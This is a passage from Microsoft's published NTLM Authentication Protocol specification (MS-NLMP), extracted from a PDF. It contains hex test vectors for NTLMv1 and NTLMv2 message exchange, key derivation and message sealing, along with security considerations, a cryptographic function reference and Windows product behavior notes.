0000000: 4e 54 4c 4d 53 53 50 00 02 00 00 00 0c 00 0c 00   NTLMSSP·········  
0000010: 38 00 00 00 33 82 02 e2 01 23 45 67 89 ab cd ef   8···3.·.·#Eg..═.  
0000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ················  
0000030: 06 00 70 17 00 00 00 0f 53 00 65 00 72 00 76 00   ··p·····S·e·r·v·  
0000040: 65 00 72 00                                       e·r· 
 
The AUTHENTICATE_MESSAGE  (section 2.2.1.3 ): 
 
0000000: 4e 54 4c 4d 53 53 50 00 03 00 00 00 18 00 18 00   NTLMSSP······ ··· 
0000010: 6c 00 00 00 18 00 18 00 84 00 00 00 0c 00 0c 00   l·······.·······  
0000020: 48 00 00 00 08 00 08 00 54 00 00 00 10 00 10 00   H·······T·······  
0000030: 5c 00 00 00 10 00 10 00 9c 00 00 00 35 82 80 e2   \·······.···5...  
0000040: 05 01 28 0a 00 00 00 0f 44 00 6f 00 6d 00 61 00   ··(·····D·o·m·a·  
0000050: 69 00 6e 00 55 00 73 00 65 00 72 00 43 00 4f 00   i·n·U·s·e·r·C·O·  
0000060: 4d 00 50 00 55 00 54 00 45 00 52 00 98 de f7 b8   M·P·U·T·E·R·....  
0000070: 7f 88 aa 5d af e2 df 77 96 88 a1 72 de f1 1 c 7d   ...]...w...r..·}  
0000080: 5c cd ef 13 67 c4 30 11 f3 02 98 a2 ad 35 ec e6   \═.·g─0·.·...5..  
0000090: 4f 16 33 1c 44 bd be d9 27 84 1f 94 51 88 22 b1   O·3·D...'...Q.".  
00000A0: b3 f3 50 c8 95 86 82 ec bb 3e 3c b7               ..P......><.  
 
 
4.2.2.4   GSS_WrapEx Examples  
The GSS_WrapEx() is specified in section 3.4.6. The following data is part of the security context 
state for the NTLM Session.  
SeqNum for the message:  
0000000: 00 00 00 00                                       ••••  
 
77 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  NONCE(4):  
0000000: 00 00 00 00                                       ••••  
Plaintext data where conf_req_flag == TRUE and sign == TRUE:  
0000000: 50 00 6c 00 61 00 69 00 6e 00 74 00 65 00 78 00   P·l·a·i·n·t·e·x·  
0000010: 74 00                                             t·  
The output message data and signature is created using SEAL() specified in section 3.4.3. 
Output_message will contain conf_s tate == TRUE, signed == TRUE and data:  
Data:  
0000000: 56 fe 04 d8 61 f9 31 9a f0 d7 23 8a 2e 3b 4d 45   V.•.a·1...#è.;ME  
0000010: 7f b8                                             ⌂╕  
Checksum: CRC32(Message):  
0000000: 7d 84 aa 93                                       }... 
RandomPad: RC4(Handle, RandomPad):  
0000000: 45 c8 44 e5                                       E.D.  
Checksum: RC4(Handle, NTLMSSP_MESSAGE_SIGNATURE.Checksum):  
0000000: 09 dc d1 df                                       ·...  
SeqNum: RC4(Handl e, 0x00000000):  
0000000: 2e 45 9d 36                                       .E.6  
SeqNum: XOR:  
0000000: 2e 45 9d 36                                       .E.6  
4.2.3   NTLM v1 with Client Challenge  
The following calculations are used in section 3.3.1. This example uses weaker key strengths than 
advised. Using stronger key strengths with NTLM v1 with client challenge results in the same 
GSS_WrapEx outputs with NTLMv2.  
The Challenge Flags used in the following NTLM v1 examples are:  
NTLMSSP_NEGOTIATE_56  
NTLMSSP_NEGOTIATE_VERSION  
 
78 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY  
NTLMSSP_TARGET_TYPE_SERVER  
NTLMSSP_NEGOTIATE_ALWAYS_SIGN  
NTLM NTLMSSP_NEGOTIATE_NTLM  
NTLMSSP_NEGOTIATE_SEAL  
NTLMSSP_NEGOTIATE_SIGN  
NTLM_NEGOTIATE_OEM  
NTLMSSP_NEGOTIATE_UNICODE  
0000000: 33  82 0a 82                                       3...  
4.2.3.1   Calculations  
4.2.3.1.1   NTOWFv1()  
The NTOWFv1() is defined in section 3.3.1. When calculating the NTOWFv1 using the values above, 
then NTOWFv1("Password", "User", "Domain") is:  
0000000: a4 f4 9c 40 65 10 bd ca b6 82 4e e7 c3 0f d8 52   ...@e.....N....R  
4.2.3.1.2   Session Base Key  
The SessionBaseKey is specified in section 3.3.1: 
0000000: d8 72 62 b0 cd e4 b1 cb 74 99 be cc cd f1 07 84   .rb.═...t...═.•.  
 
4.2.3.1.3   Key Exchange Key  
The KeyExchangeKey is specified in section 3.4.5.1 . Using the values above, the result is:  
0000000: eb 93 42 9a 8b d9 52 f8 b8 9c 55 b8 7f 47 5e dc   ..B...R...U..G..  
4.2.3.2   Results  
4.2.3.2.1   LMv1 Response  
The LmChallengeResponse is specified in section 3.3.1 . Using the previous values, the result is:  
0000000: aa aa aa aa aa aa aa aa 00 00 00 00 00 00 00 00   ................  
0000010: 00 00 00 00 00 00 00 00                           ........  
 
 
79 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  4.2.3.2.2   NTLMv1 Response  
The NTChallengeResponse is specified in section 3.3.1 . Using the values above, the result is:  
0000000: 75 37 f8 03 ae 36 71 28 ca 45 82 04 bd e7 ca f8   u7...6q(.E......  
0000010: 1e 97 ed 26 83 26 72 32                           .... r2  
 
4.2.3.3   Messages  
The CHALLENGE_MESSAGE  (section 2.2.1.2 ): 
0000000: 4e 54 4c 4d 53 53 50 00 02 00 00 00 0c 00 0c 00   NTLMSSP·········  
0000010: 38 00 00 00 33 82 0a 82 01 23 45 67 89 ab cd ef   8···3.·.·#Eg..═.  
0000020: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ················  
0000030: 06 00 70 17 00 00 00 0f 53 00 65 00 72 00 76 00   ··p·····S·e·r·v·  
0000040: 65 00 72 00                                       e·r· 
The AUTHENTICATE_MESSAGE  (section 2.2.1.3 ): 
0000000: 4e 54 4c 4d 53 53 50 00 03 00 00 00 18 00 18 00   NTLMSSP········ · 
0000010: 6c 00 00 00 18 00 18 00 84 00 00 00 0c 00 0c 00   l·······.·······  
0000020: 48 00 00 00 08 00 08 00 54 00 00 00 10 00 10 00   H·······T·······  
0000030: 5c 00 00 00 00 00 00 00 9c 00 00 00 35 82 08 82   \·······.···5.·.  
0000040: 05 01 28 0a 00 00  00 0f 44 00 6f 00 6d 00 61 00   ··(·····D·o·m·a·  
0000050: 69 00 6e 00 55 00 73 00 65 00 72 00 43 00 4f 00   i·n·U·s·e·r·C·O·  
0000060: 4d 00 50 00 55 00 54 00 45 00 52 00 aa aa aa aa   M·P·U·T·E·R·....  
0000070: aa aa aa aa 00 00 00 00 00 00 00 00 00 00 00 00   ....············  
0000080: 00 00 00 00 75 37 f8 03 ae 36 71 28 ca 45 82 04   ····u7.·.6q(.E.·  
0000090: bd e7 ca f8 1e 97 ed 26 83 26 72 32               ....·ù.&.&r2  
4.2.3.4   GSS_WrapEx Examples  
The GSS_WrapEx() is specified in section 3.4.6. The following data is part of the security context 
state for the NTLM Session.  
SeqNum for the message:  
0000000: 00 00 00 00                                       ••••  
Plaintext data where conf_req_flag == TRUE and sign == TRUE:  
0000000: 50 00 6c 00 61 00 69 00 6e 00 74 00 65 00 78 00   P·l·a·i·n·t·e·x·  
0000010: 74 00                                             t· 
The sealkey is created using SEALKEY() (section 3.4.5.3 ): 
Cut key exchange key to 56 bits:  
0000000: eb 93 42 9a 8b d9 52                              ..B...R  
 
80 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  MD5(ConcatenationOf(SealKey, "session ke y to client -to-server sealing key magic constant")):  
0000000: 04 dd 7f 01 4d 85 04 d2 65 a2 5c c8 6a 3a 7c 06   •..•M.•.e. \.j:.• 
The signkey is created using SIGNKEY() (section 3.4.5.2):  
MD5(ConcatenationOf(RandomSessionKey, "session key to client -to-serve r signing key magic 
constant")):  
0000000: 60 e7 99 be 5c 72 fc 92 92 2a e8 eb e9 61 fb 8d   `... \r...*...a..  
The output message data and signature is created using SEAL() specified in section 3.4.4. 
Output _message will contain conf_state == TRUE, signed == TRUE and data:  
Data:  
0000000: a0 23 72 f6 53 02 73 f3 aa 1e b9 01 90 ce 52 00   .#r.S•s..•.•..R•  
0000010: c9 9d                                             ╔¥  
Checksum: HMAC_MD5(SigningKey, ConcatenationO f(SeqNum, Message))[0..7]:  
0000000: ff 2a eb 52 f6 81 79 3a                            *.R..y:•  
Signature:  
0000000: 01 00 00 00 ff 2a eb 52 f6 81 79 3a 00 00 00 00   •••• *.R..y:••••  
4.2.4   NTLMv2 Authentication  
The following calculations are used in section 3.3.2. 
The Challenge Flags used in the following NTLM v2 examples are:  
NTLMSSP_NEGOTIATE_KEY_EXCH  
NTLMSSP_NEGOTIATE_56  
NTLMSSP_NEGOTIATE_128  
NTLMSSP_NEGOTIATE_VERSION  
NTLMSSP_NEGOTIATE_TARGET_INFO  
NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY  
NTLMSSP_TARGET_TYPE_SERVER  
NTLMSSP_NEGOTIATE_ALWAYS_SIGN  
NTLM NTLMSSP_NEGOTIATE_NTLM  
NTLMSSP_NEGOTIATE_SEAL  
 
81 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  NTLMSSP_NEGOTIATE_SIGN  
NTLM _NEGOTIATE_OEM  
NTLMSSP_NEGOTIATE_UNICODE  
0000000: 33 82 8a e2                                       3...  
AV Pair 1 - NetBIOS Server name:  
00000000: 53 00 65 00 72 00 76 00 65 00 72 00               S.e.r.v.e.r.  
AV Pair 2 - NetBIOS Domain name:  
00000000: 44 00 6f 00 6d 00 61 00 69 00 6e 00               D.o.m.a.i.n.  
4.2.4.1   Calculations  
4.2.4.1.1   NTOWFv2() and LMOWFv2()  
The LMOWFv2() and The NTOWFv2() are defined in section 3.3.2. When calculating the LMOWFv2 or 
NTOWFv2, using the values above, then NTOWFv2("Password", "User", "Domain") is:  
0000000: 0c 86 8a 40 3b fd 7a 93 a3 00 1e f2 2e f0 2e 3f   ...@;..........?  
4.2.4.1.2   Session Base Key  
The SessionBaseKey is specified in section 3.3.2. Using the values above:  
0000000: 8d e4 0c ca db c1 4a 82 f1 5c b0 ad 0d e9 5c a3   ......J.. \....\. 
4.2.4.2   Results  
4.2.4.2.1   LMv2 Response  
The LmChallengeResponse is specified in section 3.3.2 . Using the values above:  
0000000: 86 c3 50 97 ac 9c ec 10 25 54 76 4a 57 cc cc 19   ..P.....%TvJW...  
0000010: aa aa aa aa aa aa aa aa                           ........  
4.2.4.2.2   NTLMv2 Response  
The NTChallengeResponse is specified in section 3.3.2 . Using the values above:  
0000000: 68 cd 0a b8 51 e5 1c 96 aa bc 92 7b eb ef 6a 1c   h&#x2550;..Q......{..j.  
 
82 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  4.2.4.2.3   Encrypted Session Key  
RC4 encryption of the RandomSessionKey with the KeyExchangeKey:  
0000000: c5 da d2 54 4f c9 79 90 94 ce 1c e9 0b c9 d0 3e   ...TO.y........&gt;  
4.2.4.3   Messages  
The CHALLENGE_MESSAGE  (section 2.2.1.2 ): 
 
0000000: 4e 54 4c 4d 53 53 50 00 02 00 00 00 0c 00 0c 00   NTLMSSP•••••••••  
0000010: 38 00 00 00 33 82 8a e2 01 23 45 67 89 ab cd ef   8•••3...•#Eg..═.  
0000020: 00 00 00 00 00 00 00 00 24 00 24 00 44 00 00 00   ••••••••$•$•D•••  
0000030: 06 00 70 17 00 00 00 0f 53 00 65 00 72 00 76 00   ••p•••••S•e•r•v•  
0000040: 65 00 72 00 02 00 0 c 00 44 00 6f 00 6d 00 61 00   e•r•••••D•o•m•a•  
0000050: 69 00 6e 00 01 00 0c 00 53 00 65 00 72 00 76 00   i•n•••••S•e•r•v•  
0000060: 65 00 72 00 00 00 00 00                           e•r•••••  
The AUTHENTIC ATE_MESSAGE  (section 2.2.1.3 ): 
 
0000000: 4e 54 4c 4d 53 53 50 00 03 00 00 00 18 00 18 00   NTLMSSP·········  
0000010: 6c 00 00 00 54 00 54 00 84 00 00 00 0c 00 0c 00   l···T·T·ä·······  
0000020: 48 00 00 00 08 00 08 00 54 00 00 00 10 00 10 00   H·······T·······  
0000030: 5c 00 00 00 10 00 10 00 d8 00 00 00 35 82 88 e2   \·······.···5...  
0000040: 05 01 28 0a 00 00 00 0f 44 00 6f 00 6d 00 61 00   ··(·····D·o·m·a·  
0000050: 69 00 6e 00 55 00 73 00 65 00 72 00 43 0 0 4f 00   i·n·U·s·e·r·C·O·  
0000060: 4d 00 50 00 55 00 54 00 45 00 52 00 86 c3 50 97   M·P·U·T·E·R·..P.  
0000070: ac 9c ec 10 25 54 76 4a 57 cc cc 19 aa aa aa aa   ...·%TvJW..·....  
0000080: aa aa aa aa 68 cd 0a b8 51 e5 1c 96 aa bc 92 7b   ....h═·.Q.·....{  
0000090: eb ef 6a 1c 01 01 00 00 00 00 00 00 00 00 00 00   δ∩j·············  
00000A0: 00 00 00 00 aa aa aa aa aa aa aa aa 00 00 00 00   ····¬¬¬¬¬¬¬¬····  
00000B0: 02 00 0c 00 44 00 6f 00 6d 00 61 00 69 00 6e 00   ····D·o·m·a·i·n·  
00000C0: 01 00 0c 00 53 00 65  00 72 00 76 00 65 00 72 00   ····S·e·r·v·e·r·  
00000D0: 00 00 00 00 00 00 00 00 c5 da d2 54 4f c9 79 90   ········...TO.y.  
00000E0: 94 ce 1c e9 0b c9 d0 3e                           ..·..·..>  
4.2.4.4   GSS_WrapEx Examples  
The GSS_WrapEx() is specified in section 3.4.6. The following data is part of the security context 
state for the NTLM Session.  
SeqNum for the message:  
0000000: 00 00 00 00                                       ••••  
Plaintext data where conf_req_flag == TRUE and sign == TRUE:  
0000000: 50 00 6c 00 61 00 69 00 6e 00 74 00 65 00 78 00   P•l•a•i•n•t•e•x•  
0000010: 74 00                                             t• 
 
83 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  The sealkey is created using SEALKEY() (section 3.4.5.3 ): 
MD5(ConcatenationOf(RandomSessionKey, "session key to client -to-server sealing key magic 
constant")):  
0000000: 59 f6 00 97 3c c4 96 0a 25 48  0a 7c 19 6e 4c 58   Y.•.<─.•%H•.•nLX  
The signkey is created using SIGNKEY() (section 3.4.5.2 ): 
MD5(ConcatenationOf(RandomSessionKey, "session key to client -to-server signing key magic 
constant”)):  
0000000: 47 88 dc 86 1b 47 82 f3 5d 43 fd 98 fe 1a 2d 39   G...•G..]C...• -9 
The output message data and signature is created using SEAL() specified in section 3.4.3. 
Output_message will contain conf_state == TRUE , signed == TRUE and data:  
Data:  
0000000: 54 e5 01 65 bf 19 36 dc 99 60 20 c1 81 1b 0f 06   T.•e.•6..`...•••  
0000010: fb 5f                                             √_  
Checksum: HMAC_MD5(SigningKey, ConcatenationOf(SeqNum, Message))[0..7]:  
0000000: 70 3 5 28 51 f2 56 43 09                           p5(Q.VC•  
Checksum: RC4(Checksum above):  
0000000: 7f b3 8e c5 c5 5d 49 76                     .....]Iv  
Signature:  
0000000: 01 00 00 00 7f b3 8e c5 c5 5d 49 76 00 00 00 00   ••••.....]Iv••••  
 
84 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  5   Security  
5.1   Security Considerations for Implementers  
Implementers should be aware that NTLM does not support any recent cryptographic methods, such 
as AES or SHA -256. It uses cyclic redundancy check (CRC)  or message digest algorithms 
([RFC1321] ) for integrity, and it uses RC4 for encryption. Deriving a key from a password is as 
specified in [RFC1320]  and [FIPS46 -2]. Therefore, applications are generally advised not to use 
NTLM. <68>  
The NTLM server does not require the NTLM client to send the MIC, but sending the MIC when the 
timestamp is presen t greatly increases security.  Although implementations of NLMP will work 
without support for MIC, they will be vulnerable to message tampering.  
5.2   Index of Security Parameters  
Security parameter  Section  
MD4/MD5 usage in NTLM v1  3.3.1 
MD4/MD5 usage in NTLM v2  3.3.2 
MD5/RC4 usage during session security  3.4 
 
85 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  6   Appendix A: Cryptographic Operations Reference  
In the algorithms provided in this documentation, pseudocode is provided to illustrate the process 
used to compute keys  and perform other cryptographic operations prior to protocol exchange. The 
following table defines the general purpose functions and operations used in this pseudocode.  
Functions  Description  Section  
AddAVPair(T, Id, Value)  An auxiliary function that is  used to manage AV pairs in 
NTLM messages. It is defined as follows.  
AddAvPair(T, Id, Value) {  
    STRING T  
    USHORT Id  
    STRING Value  
    T = ConcatenationOf(T, Id)  
    T = ConcatenationOf(T, Length(Value))  
    T = ConcatenationOf(T, Value)  
} 
 3.2.5.1.1  
ComputeResponse(...)  A function that computes the NT response, LM responses, 
and key exchange key from the response keys and 
challenge.  3.1.5.1.2 , 
3.2.5.1.2 , 
3.3.1 , 3.3.2 
ConcatenationOf(string1, 
string2, ... stringN)  Indicates the left -to-right conca tenation of the string 
parameters, from the first string to the Nnth. Any numbers 
are converted to strings and all numeric conversions to 
strings retain all digits, even nonsignificant ones. The result 
is a string. For example, ConcatenationOf(0x00122, "XY Z", 
"Client") results in the string "00122XYZClient."  3.3.1 , 3.3.2, 
3.4.2 , 3.4.3, 
3.4.4 , 
3.4.5.1 , 
3.4.5.2 , 
3.4.5.3  
CRC32(M)  Indicates a 32 -bit CRC calculated over M.  3.4.3 , 3.4.4 
DES(K, D)  Indicates the encrypt ion of an 8 -byte data item D with the 
7-byte key K using the Data Encryption Standard (DES) 
algorithm in Electronic Codebook (ECB) mode. The result is 
8 bytes in length ( [FIPS46 -2]). 3.3.1 , 3.4.5.1  
DESL(K, D)  Indicates the encryption of an 8 -byte data item D with the 
16-byte key K using the Data Encryption Standard Long 
(DESL) algorithm. The result  is 24 bytes in length. DESL(K, 
D) is computed as follows.  
ConcatenationOf( DES(K[0..6], D), \ 
DES(K[7..13], D), DES( \ 
ConcatenationOf(K[14..15], Z(5)), D));  
Note   K[] implies a key represented as a character array.  3.3.1 
GetVersion()  An auxiliary function that returns an operating system 
version -specific value (section 2.2.2.8 ). 3.1.5.1.1 , 
3.1.5.1.2 , 
3.2.5.1.1 , 
3.2.5.1.2  
LMGETKEY(U, D)  Retrieve the user's LM response key from the server 
database ( directory  or local database).  3.2.5.1.2  
 
86 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  Functions  Description  Section  
NTGETKEY(U, D)  Retrieve the user's NT response key from the server 
databas e. 3.2.5.1.2  
HMAC(K, M)  Indicates the encryption of data item M with the key K 
using the HMAC algorithm ( [RFC2104] ). 3.3.2 , 3.4.4 
HMAC_MD5(K, M)  Indicates the computation of a 16 -byte HMAC -keyed MD5 
message digest of the byte string M using the key K.  3.3.2 , 3.4.4 
KXKEY(K, LM, SC)  Produces a key exchange key from the session base key, 
LM response and server challenge as defined in the 
sections KXKEY, SIGNKEY, and SEALKEY.  3.1.5.1.2 , 
3.2.5.1.2 , 
3.4.5.1  
LMOWF()  Computes a one -way function of the user's password to use 
as the r esponse key. NTLM v1 and NTLM v2 define separate 
LMOWF() functions in the NTLM v1 authentication and 
NTLM v2 authentication sections, respectively.  3.1.5.1.2 , 
3.3.1 , 3.3.2 
MD4(M)  Indicates the computation of an MD4 message digest of the 
null-terminated byte string M ( [RFC1320] ). 3.3.1 , 3.3.2 
MD5(M)  Indicates the computation of an MD5 message digest of the 
null-terminated byte string M ( [RFC1321] ). 3.3.1 , 3.3.2, 
3.4.4 , 
3.4.5. 2, 
3.4.5.3  
MD5_HASH(M)  Indicates the computation of an MD5 message digest of a 
binary blob ( [RFC4121]  section 4.1.1.2).   
NIL A zero -length strin g. 3.1.5.1.1 , 
3.1.5.1.2 , 
3.2.5.1.1 , 
3.2.5.2.2 , 
3.4.5.2  
NONCE(N)  Indicates the computation of an N-byte cryptographic -
strength random number.  
Note   The NTLM Authentication Protocol does not define 
the statistical properties of the random number generator. 
It is left to the discretion of the implementation to define 
the strength requirements of the NONCE(N) operation.  3.1.5.1.2 , 
3.2.5.1.1 , 
3.4.3 
NTOWF()  Computes a one -way function of the user's password to use 
as the response key. NTLM v1 and NTLM v2 d efine separate 
NTOWF() functions in the NTLM v1 authentication and 
NTLM v2 authentication sections, respectively.  3.1.5.1.2 , 
3.3.1 , 3.3.2 
RC4(H, D)  The RC4 Encryption Algorithm. To obtain this stream cipher 
that is licensed by RSA Data Security, Inc., contact this 
company.  
Indicates the encryption of data item D with the current 
session or message key stat e, using the RC4 algorithm. H 
is the handle to a key state structure initialized by 
RC4INIT.  3.4.3 , 3.4.4 
RC4K(K,D)  Indicates the encryption of data item  D with the key K 
using the RC4 algorithm.  3.1.5.1.2 , 
3.4.4 
 
87 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  Functions  Description  Section  
Note   The key sizes for RC4 encryption in NTLM are 
defined in sections KXKEY, SIGNKEY, and SEALKEY, where 
they are created.  
RC4Init(H, K)  Initialization of the RC4 key and handle to a key state 
structure for the session.  3.1.5.1.2 , 
3.2.5.1.2  
SEALKEY(F, K, string1)  Produces an encryption key from the session key as 
defined in sections KXKEY, SIGNKEY, and SEALKEY.  3.1.5.1.2 , 
3.4.5.3  
SIGNKEY(flag, K, string1)  Produces a signing key from the session key as defined in 
sections KXKEY, SIGNKEY, and SEALKEY.  3.1.5.1.2 , 
3.4.5.2  
Currenttime  Indicates the retrieval of the current time as a 64 -bit value, 
represented as the number of 100 -nanosecond ticks 
elapsed since midnight of January 1st, 1601 (UTC).  3.1.5.1.2  
UNICODE(string)  Indicates the 2-byte little -endian byte order encoding of 
the Unicode UTF -16 representation of string. The Byte 
Order Mark (BOM) is not sent over the wire.  3.3.1 , 3.3.2 
UpperCase(string)  Indicates the uppercase representation of string.  3.3.1 , 3.3.2 
Z(N) Indicates the creation of a byte array of length N. Each 
byte in the array is initialized to the value zero.  3.3.1 , 3.3.2 
 
88 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  7   Appendix B: Product Behavior  
The information in this specification is applicable to the following Microsoft products:  
Microsoft Windows  NT® operating system  
Microsoft Windows®  2000 operating system  
Windows®  XP operating system  
Windows Server®  2003 operating system  
Windows  Vista® operating system  
Windows Server®  2008 operating system  
Windows®  7 operating system  
Windows Server®  2008 R2 operating system  
Windows® Home Server v2 server software  
Exceptions, if any, are noted below. If  a service pack number appears with the product version, 
behavior changed in that service pack. The new behavior also applies to subsequent service packs of 
the product unless otherwise specified.  
Unless otherwise specified, any statement of optional behav ior in this specification prescribed using 
the terms SHOULD or SHOULD NOT implies product behavior in accordance with the SHOULD or 
SHOULD NOT prescription. Unless otherwise specified, the term MAY implies that product does not 
follow the prescription.  
<1> Section 1.3: Only Windows NT clients initiate requests for the LM version of the protocol. All 
Microsoft Windows servers still accept it if properly configured.  
<2> Section 1.3.1: It is possible, with the Windows implementation of connectionless NTLM, for 
messages protected by NTLM session security to precede the completion of the established NTLM 
session, but such message orderings do not occur in practice.  
<3> Section 1.4: When authenticating  a domain account with NTLM, Windows uses Netlogon ( [MS-
APDS] ) to have the DC take the challenge and the client's response, and validate the user 
authentication against the DC's user database.  
<4> Section 1. 6: Windows applications that use Negotiate ( [MS-SPNG] ) may authenticate via NTLM 
if Kerberos is not available. Authenticating via NTLM would occur if either the client or server are 
down -level (running Windows  NT 4.0 or earlier)  systems, if the server is not joined to a domain, if 
the application is using an RPC interface that uses NTLM directly, or if the administrator has not 
configured Kerberos properly. An implementer who wants to support these scenarios in which 
Kerberos doe s not work would need to implement NTLM.  
<5> Section 2.2.1.1: The Version  field is NOT sent or accessed by Windows  NT or Windows  2000.  
Windows  NT and Windows  2000 assume that the Payload  field started immediately after 
WorkstationBuff erOffset . Since all references into the Payload  field are by offset from the start 
of the message (not from the start of the Payload  field), Windows  NT and Windows  2000 can 
correctly interpret messages with Version  fields.  
 
89 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  <6> Section 2.2.1.1: The code page  mapping the OEM character set to Unicode is configurable via 
HKEY_LOCAL_MACHINE \System \CurrentControlSet \control \Nls\Codepage \OEMCP, which is a 
DWORD  that contains the assigned number of the code page.  
<7> Section 2.2.1.2: The Version  field is NOT sent or accessed by Windows  NT or Windows  2000. 
Windows  NT and Windows  2000 assume that the Payload  field started immediately after 
TargetInfoBufferOffset . Since all references into the Paylo ad field are by offset from the start of 
the message (not from the start of the Payload  field), Windows  NT and Windows  2000 can correctly 
interpret messages with Version  fields.  
<8> Section 2.2.1.3: Although the protocol allows authent ication to succeed if the client provides 
either LmChallengeResponse  or NtChallengeResponse , Windows implementations provide both.  
<9> Section 2.2.1.3: The Version  field is NOT sent or consumed by Windows  NT or Windows  2000. 
Windows  NT and Windows  2000 assume that the Payload  field started immediately after 
NegotiateFlags . Since all references into the Payload  field are by offset from the start of the 
message (not from the start of the Payload  field), Windows  NT and Windows  2000 can cor rectly 
interpret messages constructed with Version  fields.  
<10> Section 2.2.1.3: The MIC field is omitted in Windows  NT, Windows  2000, Windows  XP, and 
Windows Server  2003.  
<11> Section 2.2.2.1: MsvAvDnsTreeName  AV_PAIR type is not supported in Windows  NT and 
Windows  2000.  
<12> Section 2.2.2.1: MsvAvFlags   AV_PAIR type is not supported in Windows  NT and 
Windows  2000.  
<13> Section 2.2.2.1: MsvAvTimestamp   AV_PAIR type is not s upported in Windows  NT, 
Windows  2000, Windows  XP, and Windows Server  2003.  
<14> Section 2.2.2.1: MsAvRestrictions  AV_PAIR type is not supported in Windows  NT, 
Windows  2000, Windows  XP, and Windows Server  2003.  
<15>  Section 2.2.2.1: MsvAvTargetName  AV_PAIR type is not supported in Windows  NT, 
Windows  2000, Windows  XP, Windows Server  2003, Windows  Vista, or Windows Server  2008.  
<16> Section 2.2.2.1: MsvChannelBindings   AV_PAIR type is not supported in Windows  NT, 
Windows  2000, Windows  XP, Windows Server  2003, Windows  Vista, or Windows Server  2008.  
<17> Section 2.2.2.2: No version of Windows uses this field. Windows  NT, Windows  2000, 
Windows  XP, and Windows Server  2003 do not send this field on the wire.  
<18> Section 2.2.2.2: Windows  Vista, Windows Server  2008, Windows  7, Windows Server  2008 R2, 
and W indows Home Server v2 use a hierarchical order of values to indicate the trustworthiness of 
the client application. Lower values indicate that the subject has lower integrity.  
<19> Section 2.2.2.2: Windows  NT, Windows  2000, Windows  XP, Windows Server  2003, and 
Windows  Vista RTM do not create or send the MachineID . The MachineID  is not used by NLMP.  
<20> Section 2.2.2.5: Windows  7, Windows Server  2008 R2, and Windows Home Server v2 support 
only 128 -bit session key ne gotiation by default, therefore this bit will always be set.  
<21> Section 2.2.2.5: The NTLMSSP_NEGOTIATE_VERSION flag is not supported in Windows  NT 
and Windows  2000. This flag is used for debug purposes only.  
 
90 / 96 
[MS-NLMP] — v20100820   
 NT LAN Manage r (NTLM) Authentication Protocol Specification  
 
 Copyright © 2010 Microsoft Corporation.  
 
 Release: Friday, August 20, 2010  <22>  Section 2.2.2.5: The NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY  is not set in 
the NEGOTIATE_MESSAGE to the server and the CHALLENGE_MESSAGE to the client in Windows NT 
Server 4.0 SP3.  
<23> Section 2.2.2.5: The NTLMSSP_NEGOTIATE_OEM_WO RKSTATION_SUPPLIED  flag is not 
supported in Windows  NT and Windows  2000.  
<24> Section 2.2.2.5: The NTLMSSP_NEGOTIATE_OEM_DOMAIN_SUPPLIED  flag is not 
supported in Windows  NT and Windows  2000.  
<25> Section 2.2.2.5: Windows sends this bit for anonymous connections, but a Windows -based 
NTLM server does not use this bit when establishing the session.  
<26> Section 2.2.2.5: Windows NTLM clients can set this bit. No versions of Windows NTLM servers 
support it, so this bit is never used.  
<27> Section 2.2.2.10: NTLMSSP_NEGOTIATE_VERSION cannot be negotiated in Windows  NT, 
Windows  2000, and Windows  XP SP1.  
<28> Section 2.2.2.10: For Windows  XP SP2 and Windows Serve r 2003, the value of this field is 
WINDOWS_MAJOR_VERSION_5. For Windows  Vista, Windows Server  2008, Windows  7, Windows 
Server  2008 R2, and Windows Home Server v2, the value of this field is 
WINDOWS_MAJOR_VERSION_6.  
<29> Section 2.2.2. 10: For Windows  Vista, Windows Server  2008, and Windows Home Server v2, 
the value of this field is WINDOWS_MINOR_VERSION_0. For Windows  XP SP2, Windows  7, and 
Windows Server  2008 R2, the value of this field is WINDOWS_MINOR_VERSION_1. For Windows 
Server  2003, the value of this field is WINDOWS_MINOR_VERSION_2.  
